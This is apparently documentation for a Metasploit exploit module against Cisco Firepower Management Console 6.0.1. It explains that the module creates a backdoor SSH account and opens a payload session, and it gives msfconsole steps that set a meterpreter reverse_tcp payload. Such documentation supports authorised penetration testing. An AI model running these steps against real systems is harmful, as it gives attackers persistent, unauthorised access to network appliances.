Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/documentation/modules/exploit/linux/http/cisco_firepower_useradd.md
Views: 11789
This module exploits a vulnerability in Cisco Firepower Management Console RCE. It will create a backdoor SSH account via HTTPS, and then obtain a native payload session in SSH.
Vulnerable Application
This exploit was specifically written against 6.0.1 (build 1213). To test, you can find the virtual appliance here:
Verification Steps
Start msfconsole
use exploit/linux/http/cisco_firepower_useradd
set password [https console password for admin]
set rhost [IP]
set payload linux/x86/meterpreter/reverse_tcp
set lhost [IP]
exploit
You should get a session
Options
USERNAME The username for Cisco Firepower Management console.
PASSWORD The password for Cisco Firepower Management console.
NEWSSHUSER The SSH account to create. By default, this is random.
NEWSSHPASS The SSH password for the new account. By default, this is also random.
SSHPORT In case for some reason, the SSH changed, otherwise this is 22 by default.